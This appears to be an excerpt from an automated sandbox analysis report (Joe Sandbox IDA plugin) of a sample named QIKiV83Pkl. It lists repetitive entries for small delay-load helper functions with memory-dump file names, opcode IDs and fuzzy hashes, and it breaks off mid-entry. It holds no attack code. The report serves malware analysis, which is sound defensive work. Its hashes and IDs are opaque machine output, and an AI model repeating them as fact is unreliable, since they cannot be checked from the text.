                Function 0088DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DBD5
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 30cf2b81847b2fe475e67f9cfe2db5aac8938503364dfd2f40bd4beb80286e52
                • Instruction ID: 6c056c254a8be7851559b21809fe842cb1261c052e96b11988d98da371497651
                • Opcode Fuzzy Hash: 30cf2b81847b2fe475e67f9cfe2db5aac8938503364dfd2f40bd4beb80286e52
                • Instruction Fuzzy Hash: 21B0129936C2056C310871582C07E36036CF0C0B30330852BB21BC06C1DD404C0D5232
                Function 0088DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DBD5
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: f2da371c4ee5e3ff75708be90a5594fe1c8a5797dba98b82cddba48f2eb3e198
                • Instruction ID: 29deb2b13204bea4458d46b0805560d58b17df39778986d471612420faa12299
                • Opcode Fuzzy Hash: f2da371c4ee5e3ff75708be90a5594fe1c8a5797dba98b82cddba48f2eb3e198
                • Instruction Fuzzy Hash: EFB0129536C206AC320C71482C07D3703BCF0C0B30330851BB60AC12C1DD404C0D5232
                Function 0088DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DBD5
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: fdb6bee80e1e40b297903b028a417f51bd19ccee04eae0fe4315531eb2573d03
                • Instruction ID: 67b955d00bea919888b130a1f2cc93a8af01f65f69aeafbf3b640004c27a95ef
                • Opcode Fuzzy Hash: fdb6bee80e1e40b297903b028a417f51bd19ccee04eae0fe4315531eb2573d03
                • Instruction Fuzzy Hash: 38B0129536C2466C310C71482D07D3703ACF0C4B30330851BB30AC02C1DD414C0A5232
                Function 0088DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DAB2
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 4e35ea49122bdc60102c3f135a589cdcd2eaa877a3e82b6edb4817bdce509a7b
                • Instruction ID: d76a15f095d3b6406c648f29f0f7939b030fb8a9a3db8adf43eb63edb5316a91
                • Opcode Fuzzy Hash: 4e35ea49122bdc60102c3f135a589cdcd2eaa877a3e82b6edb4817bdce509a7b
                • Instruction Fuzzy Hash: FCB012912AC3056D310CB14A6D02E3A035CF0C1B51330821BB109C02C5E8444C085732
                Function 0088DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DC36
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 16db880624e8d2bc3d7bdf49afea95bf906f50f5719aab453dea71123bb050fa
                • Instruction ID: 16fba84ade1992b19a93cdb981cb2e85c0d67152f927f003f81f822025358c37
                • Opcode Fuzzy Hash: 16db880624e8d2bc3d7bdf49afea95bf906f50f5719aab453dea71123bb050fa
                • Instruction Fuzzy Hash: AEB0129526C305FC310C31446E12C36033DF2C0B11330871BF309E12C1A9807C486132
                Function 0088DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DC36
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 26e389e68f1ebf38de5649042ba9c3eaf354507849d9aed339e15277f521fb23
                • Instruction ID: a563399c312eed0132de3c0342b7c8a77a77f8c75227d04663f8af0c60b0bd92
                • Opcode Fuzzy Hash: 26e389e68f1ebf38de5649042ba9c3eaf354507849d9aed339e15277f521fb23
                • Instruction Fuzzy Hash: BBB0129527C302EC310C71486C12D36037CF1C0B10330861BF30DD23C1E9807C085232
                Function 0088DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DC36
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: bfb5251f0d469d06994d52b456dd1dcf559468f57216c4d5d0dd279d44601fa9
                • Instruction ID: 44e3c2b488b53e2ef12be9220bb6cfa7109ef072dba8f142ab80c7e7bf322236
                • Opcode Fuzzy Hash: bfb5251f0d469d06994d52b456dd1dcf559468f57216c4d5d0dd279d44601fa9
                • Instruction Fuzzy Hash: 0CB09295268201AC310871486812936036CE1C5B10320861AB609D2281A9806C085232
                Function 0088D8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 0961bc92abee825fb4cb689334fb0e5dd284de7d0614bcfe4156c5a33695bbd8
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: 0961bc92abee825fb4cb689334fb0e5dd284de7d0614bcfe4156c5a33695bbd8
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                Function 0088D98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: fe0bc31e849b6110b9686593af4e655ce637c522b17bf4fb3292653d58b205c1
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: fe0bc31e849b6110b9686593af4e655ce637c522b17bf4fb3292653d58b205c1
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                Function 0088D983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 18acd61d3881501dd5d22b8008e5207d5ed270f3b89f8ffc67b6c6adf428d129
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: 18acd61d3881501dd5d22b8008e5207d5ed270f3b89f8ffc67b6c6adf428d129
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                Function 0088D997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 3ef214b9db2a73c35f77ac5deb2a5650bd06f02e33d1709ce3639fb26a0eca88
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: 3ef214b9db2a73c35f77ac5deb2a5650bd06f02e33d1709ce3639fb26a0eca88
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                Function 0088D91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: e7a4bcabdbe9c265d96f9046fcb9edb97dc80d33e187e082093e8008a80bc8a3
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: e7a4bcabdbe9c265d96f9046fcb9edb97dc80d33e187e082093e8008a80bc8a3
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                Function 0088D93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 621f1a94c110a3d246afe6183857c5ca56265245eb0c93d728128310ae7cafc5
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: 621f1a94c110a3d246afe6183857c5ca56265245eb0c93d728128310ae7cafc5
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                Function 0088D95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: e3dea2301a4bb5cd4a9651646c3947b8efe481a6ff3733dcdc78576b76b45d32
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: e3dea2301a4bb5cd4a9651646c3947b8efe481a6ff3733dcdc78576b76b45d32
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                Function 0088D951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: d5dd35fb757563675c3340989994898af07ada57f44b653de7a2e06a2187f403
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: d5dd35fb757563675c3340989994898af07ada57f44b653de7a2e06a2187f403
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                Function 0088D96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
